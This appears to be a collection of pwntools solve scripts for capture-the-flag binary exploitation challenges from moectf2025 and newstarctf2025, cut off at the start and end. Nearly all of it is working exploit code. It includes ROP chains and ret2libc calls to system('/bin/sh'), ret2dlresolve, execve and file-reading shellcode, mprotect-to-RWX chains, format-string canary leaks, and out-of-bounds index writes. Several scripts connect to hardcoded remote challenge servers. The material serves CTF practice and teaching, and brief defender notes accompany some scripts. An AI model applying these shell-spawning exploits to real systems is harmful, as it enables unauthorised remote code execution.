libcname = "/home/r3t2/.config/cpwn/pkgs/2.31-0ubuntu9.18/amd64/libc6_2.31-0ubuntu9.18_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "127.0.0.1"
port = 57889

elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)

# gdb script used by the default (debugging) mode of start()
gs = '''
b vuln
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.31-0ubuntu9.18/amd64/libc6-dbg_2.31-0ubuntu9.18_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.31-0ubuntu9.18/amd64/glibc-source_2.31-0ubuntu9.18_all/usr/src/glibc/glibc-2.31
'''


def start():
    """Attach to the target: local process (P), remote host:port (R), else under gdb."""
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript=gs)


io = start()

offset = 0x78        # where the chain starts inside the sent buffer
read_length = 0x100  # where the resolver data is placed inside the buffer
rop = ROP(elf)
dlresolve = Ret2dlresolvePayload(elf, symbol='system', args=["/bin/sh"])
rop.read(0, dlresolve.data_addr)
rop.ret2dlresolve(dlresolve)
raw_rop = rop.chain()
# flat() lays both pieces at their offsets in one buffer.
payload = flat({offset: raw_rop, read_length: dlresolve.payload})
io.send(payload)
log.info(rop.dump())
io.interactive()
# 0x11 prelibc
# Solve script for moectf2025 "prelibc" (listing restored from a collapsed page;
# the gdb script's paths were de-garbled to match the other listings).  The
# target prints a libc address, which is enough to build a system("/bin/sh")
# chain.  Defender note: never print function addresses to a client.
from pwn import *

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "127.0.0.1"
port = 54127

elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)

# gdb script used by the default (debugging) mode of start()
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
'''


def start():
    """Attach to the target: local process (P), remote host:port (R), else under gdb."""
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript=gs)


io = start()

# Your exploit here
io.recvuntil(b'0x')
leak_addr = int(io.recv(12), 16)
libc_base = leak_addr - libc.sym['printf']
log.info("libc_base --> " + hex(libc_base))
system = libc_base + libc.sym['system']
binsh = libc_base + next(libc.search(b"/bin/sh"))
pop_rdi_ret = libc_base + 0x2a3e5
ret = pop_rdi_ret + 1  # extra ret keeps the stack 16-byte aligned for system
payload = b'a'*0x48 + p64(pop_rdi_ret) + p64(binsh) + p64(ret) + p64(system)
io.recvuntil(b'> ')
io.send(payload.ljust(0x100, b'\x00'))
io.interactive()
# 0x12 randomlock
# Solve script for moectf2025 "randomlock" (listing restored from a collapsed
# page; the indentation of the two `break`s was reconstructed — verify).
# Answers ten prompts with rand() % 10000 from a seeded libc.  Defender note:
# a "lock" built on rand() is predictable once the seed space is small.
from pwn import *
import ctypes

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "127.0.0.1"
port = 54327

elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)

# gdb script used by the default (debugging) mode of start()
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
'''


def start():
    """Attach to the target: local process (P), remote host:port (R), else under gdb."""
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript=gs)


clib = ctypes.CDLL("/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6")

# NOTE(review): the unconditional `break` after the inner loop stops the outer
# loop after seed 0, so the range(100) is effectively a single attempt; earlier
# processes would also be left open if the outer loop did continue.
for i in range(100):
    io = start()
    io.recvuntil(b'me?')
    clib.srand(i)
    for j in range(10):
        io.recvuntil(b'>')
        val = clib.rand() % 10000; io.sendline(str(val))
        res = io.recvline()
        if b"Incorrect password." in res:
            break
    break
io.interactive()
# 0x13 shellbox
# Solve script for moectf2025 "shellbox" (listing restored from a collapsed
# page).  Stores a small read-the-file stub, then feeds a chain one qword per
# prompt that calls mprotect(0x4ce000, 0x1000, 7) and jumps to the stub.
# Defender note: an mprotect() to RWX from a network-facing process is a
# high-signal event — block PROT_EXEC on writable pages with seccomp/SELinux.
from pwn import *

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "127.0.0.1"
port = 52443

elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)

# gdb script used by the default (debugging) mode of start()
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
'''


def start():
    """Attach to the target: local process (P), remote host:port (R), else under gdb."""
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript=gs)


io = start()

# Gadget addresses from the (static) binary; several are unused here.
pop_rax_ret = 0x44bbbb
pop_rdi_ret = 0x401a40
pop_rsi_ret = 0x401a42
pop_rdx_ret = 0x401a44
pop_rsp_ret = 0x4121a8
ret = 0x40101a
syscall = 0x401268
pop_rdi_rbp_ret = 0x4025e1
mprotect = 0x443520
buf = 0x4ceb60

# openat(AT_FDCWD, "flag", 0) -> read(fd, rsp, 0x100) -> write(1, rsp, rax).
# 0x67616c66 is "flag" little-endian; 257/0/1 are the x86-64 syscall numbers.
shellcode = asm('''
push 0x67616c66
mov rsi,rsp
xor rdx,rdx
mov rdi,0xffffff9c
push 257
pop rax
syscall
mov rdi,rax
mov rsi,rsp
mov edx,0x100
xor eax,eax
syscall
mov edi,1
mov rsi,rsp
push 1
pop rax
syscall
''')
io.recvuntil(b'.')
io.send(shellcode)
io.recvuntil(b'>')
payload = b'a'*4 + p32(1)
io.send(payload)


def rop(data):
    """Send one chain element at the next '>' prompt."""
    io.recvuntil(b'>')
    io.send(data)


rop(p64(pop_rdi_ret))
rop(p64(0x4ce000))
rop(p64(pop_rsi_ret))
rop(p64(0x1000))
rop(p64(pop_rdx_ret))
rop(p64(7))
rop(p64(mprotect))
rop(p64(buf))
io.interactive()
# 0x14 strcheck
# Solve script for moectf2025 "strcheck" (listing restored from a collapsed
# page): a "meow" prefix, NUL padding, then a ret and a function address; the
# second answer is the payload's length.  Defender note: checks that stop at
# the first NUL (strlen/strcmp) are bypassed by embedded NULs — validate with
# the real length, not the C-string length.
from pwn import *

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "127.0.0.1"
port = 63625

elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)

# gdb script used by the default (debugging) mode of start()
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
'''


def start():
    """Attach to the target: local process (P), remote host:port (R), else under gdb."""
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript=gs)


io = start()

sys_addr = 0x401236
ret = 0x40101a
payload = b'meow' + b'\x00'*0x24 + p64(ret) + p64(sys_addr)
io.recvuntil(b'say?')
io.sendline(payload)
io.recvuntil(b'it?')
# The length is sent as a str; pwntools encodes it.
io.sendline(str(len(payload)))
io.interactive()
# 0x15 syslock
# Solve script for moectf2025 "syslock" (listing restored from a collapsed
# page).  Answers the mode prompt with "-32", stores 59 and "/bin/sh" via the
# password prompt, then sends a syscall chain (rax=59 -> execve).  Defender
# note: a negative mode value accepted by a signed check is the likely bug
# (inferred) — validate ranges on the unsigned type you index with.
from pwn import *

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "127.0.0.1"
port = 51017

elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)

# gdb script used by the default (debugging) mode of start()
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
'''


def start():
    """Attach to the target: local process (P), remote host:port (R), else under gdb."""
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript=gs)


io = start()

pop_rax_ret = 0x401244
syscall = 0x401230
pop_rdi_rsi_rdx_ret = 0x401240
ret = 0x40101a  # unused in this script (kept from the original)
binsh = 0x404084

io.recvuntil(b'mode\n')
io.send(b'-32')
io.recvuntil(b'password\n')
payload = p32(59) + b'/bin/sh\x00'
io.send(payload)
io.recvuntil(b'Mode.\n')
# execve(binsh, 0, 0): rax=59, rdi=binsh, rsi=rdx=0, then syscall.
payload = b'A'*0x48 + p64(pop_rax_ret) + p64(59) + p64(pop_rdi_rsi_rdx_ret) + p64(binsh) + p64(0) + p64(0) + p64(syscall)
io.send(payload)
io.interactive()
# 0x16 xdulaker
# Solve script for moectf2025 "xdulaker" (listing restored from a collapsed
# page).  Option 1 prints an address that pins the PIE base; option 2 stores
# the key repeated; option 3 takes the overflowing input.  Defender note: PIE
# is only as strong as the absence of address leaks.
from pwn import *

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "127.0.0.1"
port = 59912

elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)

# gdb script used by the default (debugging) mode of start()
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
'''


def start():
    """Attach to the target: local process (P), remote host:port (R), else under gdb."""
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript=gs)


io = start()

menu = b'>'
io.recvuntil(menu)
io.sendline(b'1')
io.recvuntil(b'0x')
leak_addr = int(io.recv(12), 16)
# 0x4010 is the leaked object's offset inside the binary (author's analysis).
elf_base = leak_addr - 0x4010
log.success("elf_base --> " + hex(elf_base))
backdoor = elf_base + 0x1249
ret = elf_base + 0x0101a
key = b'xdulaker'

io.recvuntil(menu)
io.sendline(b'2')
io.send(key*8)
io.recvuntil(menu)
io.sendline(b'3')
io.recvuntil(b'xdulaker')
payload = b'a'*0x38 + p64(ret) + p64(backdoor)
io.sendline(payload)
io.interactive()
# 0x17 calc_beta
# Solve script for newstarctf2025 "calc_beta" (listing restored from a collapsed
# page).  The "edit" menu writes 64-bit values by index; indices beyond the
# array lay out a chain that first leaks write@GOT via write(1, got, 0x100) and
# returns to main, then calls system("/bin/sh").  Defender note: the unchecked
# index is the bug — reject idx >= array length before the store.
from pwn import *

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.27-3ubuntu1.6/amd64/libc6_2.27-3ubuntu1.6_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "39.106.48.123"
port = 23011

elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)

# gdb script used by the default (debugging) mode of start()
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.27-3ubuntu1.6/amd64/libc6-dbg_2.27-3ubuntu1.6_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.27-3ubuntu1.6/amd64/glibc-source_2.27-3ubuntu1.6_all/usr/src/glibc/glibc-2.27
'''


def start():
    """Attach to the target: local process (P), remote host:port (R), else under gdb."""
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript=gs)


io = start()


def show():
    """Menu option 1 (defined but not used by this script)."""
    io.recvuntil(b'5. Exit')
    io.recvuntil(b'> ')
    io.sendline(b'1')


def edit(idx, data):
    """Menu option 2: store the decimal value `data` at index `idx`."""
    io.recvuntil(b'5. Exit')
    io.recvuntil(b'> ')
    io.sendline(b'2')
    io.recvuntil(b'Which number?')
    io.recvuntil(b'> ')
    io.sendline(str(idx).encode())
    io.recvuntil(b'Change to what?')
    io.recvuntil(b'> ')
    io.sendline(str(data).encode())


pop_rdi_ret = 0x401253
pop_rsi_r15_ret = 0x401251  # unused in this script (kept from the original)
ret = pop_rdi_ret + 1
write_plt = elf.plt['write']  # unused in this script (kept from the original)
write_got = elf.got['write']
main = 0x4010b4 + 1

# Stage 1: 0x40124A / 0x401230 are gadgets in the binary (author's analysis);
# slots 2..7 hold the register values they pop, 9..15 are filler, 16 is main.
edit(1, 0x40124A)
edit(2, 0)
edit(3, 1)
edit(4, write_got)
edit(5, 1)
edit(6, write_got)
edit(7, 0x100)
edit(8, 0x401230)
edit(9, 0)
edit(10, 0)
edit(11, 0)
edit(12, 0)
edit(13, 0)
edit(14, 0)
edit(15, 0)
edit(16, main)
# Index 0 is written last; presumably it is the slot whose store triggers the
# chain (inferred from the ordering).
edit(0, ret)

leak_addr = u64(io.recv(6).ljust(0x8, b'\x00'))
log.info("leak_addr --> " + hex(leak_addr))
libc_base = leak_addr - libc.sym['write']
log.info("libc_base --> " + hex(libc_base))
system = libc_base + libc.sym['system']
binsh = libc_base + next(libc.search(b'/bin/sh'))

# Stage 2: system("/bin/sh").
edit(1, pop_rdi_ret)
edit(2, binsh)
edit(3, system)
edit(0, ret)
io.interactive()
# 0x18 calc_meow -- the author's solve script (newstarctf2025).
# Offsets are specific to the distributed `pwn_patched` binary and the
# 2.35-0ubuntu3.10 libc; the paths are the author's local cpwn cache.
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "8.147.132.32"
port = 21281
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
'''
def start():
    """Select the target: P -> local process, R -> remote, else gdb with `gs`.

    NOTE: the name `start` is rebound to an integer further down, after
    this function has already been called once.
    """
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript=gs)
io = start()
# Menu helpers. Every prompt in this binary ends in '>', so each helper
# waits for that marker before answering.
def show():
    """Main menu option 1 (not called in this script)."""
    io.recvuntil(b'>')
    io.sendline(b'1')
def edit(idx, data):
    """Main menu option 2: store integer `data` in slot `idx`."""
    io.recvuntil(b'>')
    io.sendline(b'2')
    io.recvuntil(b'>')
    io.sendline(str(idx).encode())
    io.recvuntil(b'>')
    io.sendline(str(data).encode())
def clean():
    """Main menu option 3 (not called in this script)."""
    io.recvuntil(b'>')
    io.sendline(b'3')
def go_calc():
    """Main menu option 4: enter the calculator sub-menu."""
    io.recvuntil(b'>')
    io.sendline(b'4')
def add(idx1, idx2, res_idx):
    """Calculator option 1: slot[res_idx] = slot[idx1] + slot[idx2]."""
    io.recvuntil(b'>')
    io.sendline(b'1')
    io.recvuntil(b'>')
    io.sendline(str(idx1).encode())
    io.recvuntil(b'>')
    io.sendline(str(idx2).encode())
    io.recvuntil(b'>')
    io.sendline(str(res_idx).encode())
def sub(idx1, idx2, res_idx):
    """Calculator option 2 (not called in this script)."""
    io.recvuntil(b'>')
    io.sendline(b'2')
    io.recvuntil(b'>')
    io.sendline(str(idx1).encode())
    io.recvuntil(b'>')
    io.sendline(str(idx2).encode())
    io.recvuntil(b'>')
    io.sendline(str(res_idx).encode())
def exit_calc():
    """Calculator option 6: leave the calculator sub-menu."""
    io.recvuntil(b'>')
    io.sendline(b'6')
def ret():
    """Calculator option 5. NOTE: shadowed by the integer `ret` assigned below,
    so this function is never callable after that point."""
    io.recvuntil(b'>')
    io.sendline(b'5')
# `base` is the PIE offset of the value observed at slot 0 during debugging
# (0x555555554000 is gdb's default no-ASLR load base).
base = 0x555555555cda - 0x555555554000
pop_rdi_nop_ret = 0x1d11
ret = pop_rdi_nop_ret + 2
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
log.info("puts_plt --> " + hex(puts_plt))
log.info("puts_got --> " + hex(puts_got))
main = 0x1be5
start = 0x1160
edit(1, pop_rdi_nop_ret - base)
edit(2, puts_got - base)
edit(3, puts_plt - base)
edit(4, start - base)
edit(5, ret - base)
go_calc()
add(0, 1, 1)
add(0, 2, 2)
add(0, 3, 3)
add(0, 4, 4)
add(0, 5, 0)
exit_calc()
# puts() output is newline-terminated; take the 6 bytes before the '\n'.
leak_addr = u64(io.recvuntil(b'\x0a')[-7:-1].ljust(0x8, b'\x00'))
log.info("leak_addr --> " + hex(leak_addr))
libc_base = leak_addr - libc.sym['puts']
log.info("libc_base --> " + hex(libc_base))
pop_rdi_ret = libc_base + 0x2a3e5
ret = pop_rdi_ret + 1
system = libc_base + libc.sym['system']
# NOTE(review): a str is passed where calc_beta passes b'/bin/sh'; newer
# pwntools coerces it, but the bytes form is the unambiguous one.
binsh = libc_base + next(libc.search('/bin/sh'))
edit(1, pop_rdi_ret)
edit(2, binsh)
edit(3, system)
edit(0, ret)
io.interactive()
# 0x19 计算喵的复仇 (calc_meow revenge) -- the author's solve script (newstarctf2025).
# Offsets are specific to the distributed `pwn_patched` binary and the
# 2.35-0ubuntu3.10 libc; the paths are the author's local cpwn cache.
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "39.106.57.152"
port = 20934
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
'''
def start():
    """Select the target: P -> local process, R -> remote, else gdb with `gs`.

    NOTE: the name `start` is rebound to an integer further down, after
    this function has already been called once.
    """
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript=gs)
io = start()
# Menu helpers; every prompt ends in '>'.
def show():
    """Main menu option 1: print the stored numbers."""
    io.recvuntil(b'>')
    io.sendline(b'1')
def edit(idx, data):
    """Main menu option 2: store integer `data` in slot `idx`."""
    io.recvuntil(b'>')
    io.sendline(b'2')
    io.recvuntil(b'>')
    io.sendline(str(idx).encode())
    io.recvuntil(b'>')
    io.sendline(str(data).encode())
def clean():
    """Main menu option 3 (not called in this script)."""
    io.recvuntil(b'>')
    io.sendline(b'3')
def go_calc():
    """Main menu option 4: enter the calculator sub-menu."""
    io.recvuntil(b'>')
    io.sendline(b'4')
def add(idx1, idx2, res_idx):
    """Calculator option 1: slot[res_idx] = slot[idx1] + slot[idx2]."""
    io.recvuntil(b'>')
    io.sendline(b'1')
    io.recvuntil(b'>')
    io.sendline(str(idx1).encode())
    io.recvuntil(b'>')
    io.sendline(str(idx2).encode())
    io.recvuntil(b'>')
    io.sendline(str(res_idx).encode())
def sub(idx1, idx2, res_idx):
    """Calculator option 2 (not called in this script)."""
    io.recvuntil(b'>')
    io.sendline(b'2')
    io.recvuntil(b'>')
    io.sendline(str(idx1).encode())
    io.recvuntil(b'>')
    io.sendline(str(idx2).encode())
    io.recvuntil(b'>')
    io.sendline(str(res_idx).encode())
def exit_calc():
    """Calculator option 6: leave the calculator sub-menu."""
    io.recvuntil(b'>')
    io.sendline(b'6')
def ret():
    """Calculator option 5. NOTE: shadowed by the integer `ret` assigned below."""
    io.recvuntil(b'>')
    io.sendline(b'5')
# PIE offsets recovered by the author under gdb (0x555555554000 = no-ASLR base).
base = 0x555555555e53 - 0x555555554000
pop_rdi_nop_ret = 0x1e8a
pop_rbp_ret = 0x1233   # not used below
ret = pop_rdi_nop_ret + 2
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
log.info("puts_plt --> " + hex(puts_plt))
log.info("puts_got --> " + hex(puts_got))
main = 0x1d5e        # not used below
start = 0x1160       # not used below
magic_puts = 0x1e75  # not used below
call_read = 0x12db
calc = 0x1cb2        # not used below
edit_num = 0x14d5    # not used below
go_calc()
add(0, 1, 1)
exit_calc()
show()
io.recvuntil(b'num1 = ')
# The program prints the value in decimal; 15 digits are consumed.
leak_addr = int(io.recv(15), 10)
elf_base = leak_addr - 0x1e53
log.info("elf_base --> " + hex(elf_base))
edit(0, elf_base + call_read)
payload = b'a'*0x8 + p64(elf_base + ret) + p64(elf_base + pop_rdi_nop_ret) +\
    p64(elf_base + puts_got) + p64(elf_base + puts_plt) + p64(elf_base + call_read)
io.send(payload)
# puts() output is newline-terminated; take the 6 bytes before the '\n'.
leak_addr = u64(io.recvuntil(b'\x0a')[-7:-1].ljust(0x8, b'\x00'))
log.info("leak_addr --> " + hex(leak_addr))
libc_base = leak_addr - libc.sym['puts']
log.info("libc_base --> " + hex(libc_base))
pop_rdi_ret = libc_base + 0x2a3e5
ret = pop_rdi_ret + 1
system = libc_base + libc.sym['system']
# NOTE(review): str passed where bytes (b'/bin/sh') is the unambiguous form.
binsh = libc_base + next(libc.search('/bin/sh'))
payload = b'a'*0x28 + p64(pop_rdi_ret) + p64(binsh) + p64(ret) + p64(system)
io.send(payload)
io.interactive()
# 0x1a fmt_canary -- the author's solve script (newstarctf2025).
# Offsets are specific to the distributed `pwn_patched` binary and the
# 2.35-0ubuntu3.10 libc; the paths are the author's local cpwn cache.
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "8.147.132.32"
port = 16586
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
'''
def start():
    """Select the target: P -> local process, R -> remote, else gdb with `gs`."""
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript=gs)
io = start()
payload = b'%11$p%33$p'
io.sendline(payload)
# Two pointers come back as "0x..." tokens: a full 16-digit one, then a
# 12-digit userland address.
io.recvuntil(b'0x')
canary = int(io.recv(16), 16)
io.recvuntil(b'0x')
leak_addr = int(io.recv(12), 16)
# 128 is presumably the return offset into __libc_start_main for this libc
# build -- verify against the matched libc if reusing.
libc_base = leak_addr - 128 - libc.sym['__libc_start_main']
log.info("libc_base --> " + hex(libc_base))
log.info("canary --> " + hex(canary))
system = libc_base + libc.sym['system']
# NOTE(review): str passed where bytes (b'/bin/sh') is the unambiguous form.
binsh = libc_base + next(libc.search('/bin/sh'))
pop_rdi_ret = libc_base + 0x2a3e5
ret = pop_rdi_ret + 1
io.sendline(b'end')
payload = b'a'*0x28 + p64(canary)*2 + p64(pop_rdi_ret) + p64(binsh) + p64(ret) + p64(system)
io.sendline(payload)
io.interactive()
# Untitled solve script (newstarctf2025; the section heading is missing
# from this page). Hand-written execve("/bin//sh") shellcode is sent raw.
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "39.106.48.123"
port = 13668
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
'''
def start():
    """Select the target: P -> local process, R -> remote, else gdb with `gs`."""
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript=gs)
io = start()
# 0x68732f2f6e69622f is "/bin//sh" in little-endian; 59 = SYS_execve on amd64.
shellcode = asm('''
xor rsi, rsi
push rsi
mov rdi, 0x68732f2f6e69622f
push rdi
push rsp
pop rdi
mov al, 59
cdq
syscall
''')
io.send(shellcode)
io.interactive()
# Untitled solve script (newstarctf2025; the section heading is missing
# from this page). Same shellcode as the previous script minus the
# `xor rsi, rsi`, so rsi is whatever the program left in it.
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "47.94.87.199"
port = 22770
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
'''
def start():
    """Select the target: P -> local process, R -> remote, else gdb with `gs`."""
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript=gs)
io = start()
shellcode = asm('''
push rsi
mov rdi, 0x68732f2f6e69622f
push rdi
push rsp
pop rdi
mov al, 59
cdq
syscall
''')
io.send(shellcode)
io.interactive()
# 0x1d int_bug -- the author's solve script (newstarctf2025).
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "8.147.132.32"
port = 19832
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
'''
def start():
    """Select the target: P -> local process, R -> remote, else gdb with `gs`."""
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript=gs)
io = start()
# 0x7fff + 1 sends of '1' in total: 0x7fff is INT16_MAX, the boundary a
# 16-bit signed counter crosses on the following increment.
for _ in range(0x7fff):
    io.sendline(b'1')
io.sendline(b'1')
io.interactive()
# 0x1e noshell -- the author's solve script (newstarctf2025).
# Gadget addresses are specific to the distributed (unpatched) `pwn` binary.
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
